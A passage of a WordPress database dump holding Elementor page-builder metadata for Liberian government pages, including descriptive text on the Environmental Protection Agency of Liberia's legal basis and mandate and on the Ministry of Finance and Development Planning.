:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:21:\"section_divider_style\";a:2:{s:5:\"color\";i:1;s:3:\"gap\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(18463,2706,'_elementor_edit_mode','builder'),(18464,2706,'_elementor_template_type','wp-post'),(18465,2706,'_elementor_version','2.7.5'),(18466,2706,'_wp_page_template','default'),(18467,2706,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7516eed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Protection Agency (EPA) is the regulatory Institution of the Government of Liberia for the sustainable management of the environment and its natural resources. The Agency was established by an act of the Legislature November 26, 2002 and published into hand bill on April 30, 2003.<\\/p><p>The EPA operates on three basic legal Instruments: The National Environmental Policy (NEP), The Environmental Management and Protection Law of Liberia and the Act Creating the Environmental Protection Agency. Of these three instruments, the National Environmental Policy ordered the creation of the Environmental Protection Agency to ensure sound environmental management and put in place measure to avoid irreparable damage to the country\\u2019s natural resources. The NEP seeks to harmonize cross cutting functions between and amongst agencies. The NEP seeks to ensure long-term economic prosperity of Liberia through sustainable social and economic development of the generation without endangering the potential of future generation. The objective of the NEP is to improve the physical environment, the quality of life and the improvement of economic and social living condition of the citizenry present and future generations. It also seeks to ensure reconciliation and coordination between economic development and growth with the sustainable management of the natural resources. A National Environmental Policy provides a broad framework for the implementation of national objectives and plans.<\\/p><p>The Environmental Protection and Management Law (EPML) of Liberia establishes a legal framework for the sustainable development, management and protection of the environment by the Environment Protection Agency in partnership with regulatory Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith. The EMPL have several principles and objectives to include but not limited to the following: The principle of sustainable development; The pre-cautionary principle, The polluter - pays principle, The principle of inter-generational equity, The principle of public participation, The principle of international co-operation in the management of environmental resources shared by two or more states; and Other principles of natural resources and environmental management.<\\/p><p>The Act creating the Agency provides the legal mandates and authority to manage coordinate, monitor and supervise in consultation with relevant line Ministries, Agencies and organization, and other relevant stakeholders for the protection of the environment and sustainable use of natural resources. The act details the functions of the EPA from the Policy Council to environmental inspectors. The Act also clearly explain the entire environmental impact assessment (EIA) process in its totality.<\\/p><h5>Mandate<\\/h5><p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6cf88ad\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mfdp\\\",\\\"tag_id\\\":\\\"188\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mfdp\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4b4838c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e6d88a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"89a8be2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df7fe5f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:epa\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(18470,2707,'_elementor_edit_mode','builder'),(18471,2707,'_elementor_template_type','wp-post'),(18472,2707,'_elementor_version','2.7.5'),(18473,2707,'_wp_page_template','default'),(18474,2707,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7516eed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Protection Agency (EPA) is the regulatory Institution of the Government of Liberia for the sustainable management of the environment and its natural resources. The Agency was established by an act of the Legislature November 26, 2002 and published into hand bill on April 30, 2003.<\\/p><p>The EPA operates on three basic legal Instruments: The National Environmental Policy (NEP), The Environmental Management and Protection Law of Liberia and the Act Creating the Environmental Protection Agency. Of these three instruments, the National Environmental Policy ordered the creation of the Environmental Protection Agency to ensure sound environmental management and put in place measure to avoid irreparable damage to the country\\u2019s natural resources. The NEP seeks to harmonize cross cutting functions between and amongst agencies. The NEP seeks to ensure long-term economic prosperity of Liberia through sustainable social and economic development of the generation without endangering the potential of future generation. The objective of the NEP is to improve the physical environment, the quality of life and the improvement of economic and social living condition of the citizenry present and future generations. It also seeks to ensure reconciliation and coordination between economic development and growth with the sustainable management of the natural resources. A National Environmental Policy provides a broad framework for the implementation of national objectives and plans.<\\/p><p>The Environmental Protection and Management Law (EPML) of Liberia establishes a legal framework for the sustainable development, management and protection of the environment by the Environment Protection Agency in partnership with regulatory Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith. The EMPL have several principles and objectives to include but not limited to the following: The principle of sustainable development; The pre-cautionary principle, The polluter - pays principle, The principle of inter-generational equity, The principle of public participation, The principle of international co-operation in the management of environmental resources shared by two or more states; and Other principles of natural resources and environmental management.<\\/p><p>The Act creating the Agency provides the legal mandates and authority to manage coordinate, monitor and supervise in consultation with relevant line Ministries, Agencies and organization, and other relevant stakeholders for the protection of the environment and sustainable use of natural resources. The act details the functions of the EPA from the Policy Council to environmental inspectors. The Act also clearly explain the entire environmental impact assessment (EIA) process in its totality.<\\/p><h5>Mandate<\\/h5><p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6cf88ad\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mfdp\\\",\\\"tag_id\\\":\\\"188\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mfdp\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4b4838c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e6d88a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"89a8be2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df7fe5f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mfdp\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(18476,2708,'_elementor_edit_mode','builder'),(18477,2708,'_elementor_template_type','wp-post'),(18478,2708,'_elementor_version','2.7.5'),(18479,2708,'_wp_page_template','default'),(18480,2708,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7516eed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry of Finance and Development Planning, or MFDP for short, was created in 2013 by an Act of the National Legislature, in line with international financial management best practices. The new MFDP effectively replaces the Ministry of Finance and the Ministry of Planning and Economic Affairs, with the mandate to formulate, institutionalize and administer economic development, fiscal and tax policies for the promotion of sound and efficient management of financial resources of the government.<\\/p><p>As custodian of the country\\u2019s economy, the MFDP combines public finance, development planning and economic management expertise and experience to effectively manage the economy.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6cf88ad\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mfdp\\\",\\\"tag_id\\\":\\\"188\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mfdp\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4b4838c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e6d88a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"89a8be2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df7fe5f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mfdp\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(18481,2704,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:21:\"section_divider_